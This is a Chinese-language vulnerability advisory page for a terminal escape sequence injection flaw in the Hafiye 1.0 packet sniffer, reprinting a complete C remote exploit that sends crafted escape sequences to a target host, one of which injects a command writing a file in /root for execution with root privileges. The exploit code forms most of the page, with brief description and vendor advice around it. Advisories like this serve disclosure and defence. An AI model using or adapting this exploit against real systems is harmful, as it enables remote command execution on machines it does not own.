发布日期：2004-08-23
更新日期：2004-08-24

受影响系统：

EnderUNIX Hafiye 1.0

描述：

---

BUGTRAQ  ID: 11014

Hafiye是一款POSIX兼容的TCP/IP包嗅探程序。

Hafiye不正确过滤负载数据，远程攻击者可以利用这个漏洞注入恶意数据到包中，并可能造成拒绝服务或者执行任意命令。

Hafiye当打印负载数据到终端时没有对转义字符进行过滤，恶意攻击者可以发送带有转义字符的包给Hafiye解析，如果Hafiye以-n选项启动，就可能导致包含的恶意负载数据以root用户权限执行。

<*来源：Serkan Akpolat （sakpolat@gmx.net）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=109329803304298&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Serkan Akpolat （sakpolat@gmx.net）提供了如下测试方法：

/* Remote Exploit for Hafiye-1.0
** Terminal Escape Sequence Injection Vulnerability
** Written by Serkan Akpolat
** Homepage: http://deicide.siyahsapka.org
** E-mail: deicide@siyahsapka.org
** Greets: Virulent, gorny and all other netricians
*/
#include <stdio.h>
#include <sys/types.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdlib.h>

typedef struct _target {
     char *host;
     u_short port;
     unsigned int sequence;
     unsigned int cnt;
} target;

char *esc_sequence[]= {"Escape Sequences",
                        "\x1b""]2;Insecure?""\x07\x0a",
                        "\x07\x07\x07\x07\x07\x07",
                        "\x1b""]2;;echo Owned > /root/Owned.txt"
                        "\x07\x1b""[21t""\x1b""]2;xterm""\x07"
                        "Abnormal Termination""\x1b"
                        "[8m;""\x0a"};


char use[] ="\t[ -h host ] [ -p port ] [ -e esc-seq-n ] [ -l number ]\n"
             "\t  Escape Sequences :\n"
             "\t1-Change TitleBar Text to \"Insecure?\"\n"
             "\t2-Ring The Bell\n"
             "\t3-Hidden Prompt to Create Owned.txt in /root\n"
             "\tExample: ./exp -h 192.168.0.3 -p 80 -e 1 -l 1\n";

void usage()
{
     printf("%s",use);
     exit(1);
}

int connect_to_host(char *host, u_short port)
{
     int sock = 0;
     struct hostent *hp;
     struct sockaddr_in sa;

     memset(&sa, 0, sizeof(sa));

     hp = gethostbyname(host);
     if (hp == NULL) {
         herror("Error:");
        exit(1);
     }
     sa.sin_family = AF_INET;
     sa.sin_port = htons(port);
     sa.sin_addr = **((struct in_addr **) hp->h_addr_list);

     sock = socket(AF_INET, SOCK_STREAM, 0);
     if (sock < 0)
         exit(1);

     if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
         exit(1);

     printf("[+] Connected to %s\n", host);
     return sock;
}

int main(int argc, char **argv)
{
     int i;
     int sock = 0;
     char buf[256]="\0";
     target target;
     memset(&target,0,sizeof(target));
     while ((i = getopt(argc, argv, "h:p:e:l:")) != -1) {
         switch (i) {
             case 'h':
                 target.host = optarg;
                 break;
             case 'p':
                 target.port = (u_short)atoi(optarg);
                 break;
             case 'e':
                 target.sequence = atoi(optarg);
                 if(target.sequence < 1 || target.sequence > 3) {
                     usage();
                 }
                 break;
             case 'l':
                 target.cnt=atoi(optarg);
                 if(target.cnt<1) {
                     target.cnt=1;
                 }
                 break;
             case ':':
             case '?':
             default:
                 usage();
                 exit(1);
         }
     }
     if (optind != argc  || !target.host || !target.port ||
        !target.sequence || !target.cnt) {
         usage();
     }

     sock = connect_to_host(target.host, target.port);
     strncpy(buf,esc_sequence[target.sequence],sizeof(buf)-1);


     printf("[+] Sending Escape Sequences\n");
     do {
         if (send(sock, buf, strlen(buf), 0) < 0) {
             printf("Socket Error\n");
             exit(1);
         }
         target.cnt--;
     } while(target.cnt > 0);
     close(sock);
     return 0;

建议：

---

厂商补丁：

EnderUNIX
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.enderunix.org/hafiye/

浏览次数：2768
严重程度：0（网友投票）